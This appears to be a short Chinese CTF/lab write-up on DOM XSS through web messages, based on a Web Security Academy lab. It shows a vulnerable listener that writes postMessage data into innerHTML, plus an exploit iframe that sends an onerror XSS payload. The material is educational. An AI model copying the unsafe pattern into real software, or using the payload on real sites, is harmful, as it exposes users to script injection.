CTF-WEB: 利用Web消息造成DOM XSS

A5rZ2025-02-16 13:45

如果索引中有类似如下代码

js 复制代码 
<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
    window.addEventListener('message', function(e) {
        document.getElementById('ads').innerHTML = e.data;
    });
</script>
  • 这行代码的作用是将接收到的消息内容(e.data)设置为 id'ads' 的元素的 HTML 内容

那么在受害者段执行如下代码会导致DOM污染

html 复制代码 
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

参考

实验:使用 Web 消息的 DOM XSS |网络安全学院

相关推荐
mooyuan天天10 小时前
DVWA靶场通关笔记-存储型XSS(Stored Impossible级别)
xss·xss漏洞·存储型xss·dvwa靶场
Suckerbin14 小时前
DarkHole: 2靶场渗透
笔记·安全·web安全·网络安全
喜葵14 小时前
前端安全防护深度实践:从XSS到供应链攻击的全面防御
前端·安全·xss
lingggggaaaa16 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE
redis·笔记·学习·算法·安全·网络安全·couchdb
塔子终结者1 天前
网络安全A模块专项练习任务十解析
java·服务器·网络安全
2301_780789661 天前
渗透测试与网络安全审计的关系
网络·数据库·安全·web安全·网络安全
王火火(DDoS CC防护)1 天前
服务器IP暴露被攻击了怎么办?
服务器·网络安全·ddos攻击
卓码软件测评1 天前
第三方web测评机构:【WEB安全测试中HTTP方法(GET/POST/PUT)的安全风险检测】
前端·网络协议·安全·web安全·http·xss
2401_865382501 天前
各省市信息化项目管理办法中的网络安全等级保护如何规定的?
网络安全·信息化项目·项目审批
被巨款砸中1 天前
前端视角下的 Web 安全攻防:XSS、CSRF、DDoS 一次看懂
前端·安全·xss
热门推荐
012025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!022025年数学建模国赛C题超详细解题思路032025全国大学生数学建模C题保姆级思路模型(持续更新):NIPT 的时点选择与胎儿的异常判定042025高教社杯国赛数学建模选题建议+初步分析052025国赛B题保姆级教程思路分析 碳化硅外延层厚度的确定06UV安装并设置国内源07奈飞工厂官网,国内Netflix影视在线看|中文网页电脑版入口08KGG转MP3工具|非KGM文件|解密音频09(E题|AI 辅助智能体测)2025年高教杯全国大学生数学建模国赛解题思路|完整代码论文集合10不再让Windows更新!&Edge游戏助手卸载及关闭自动更新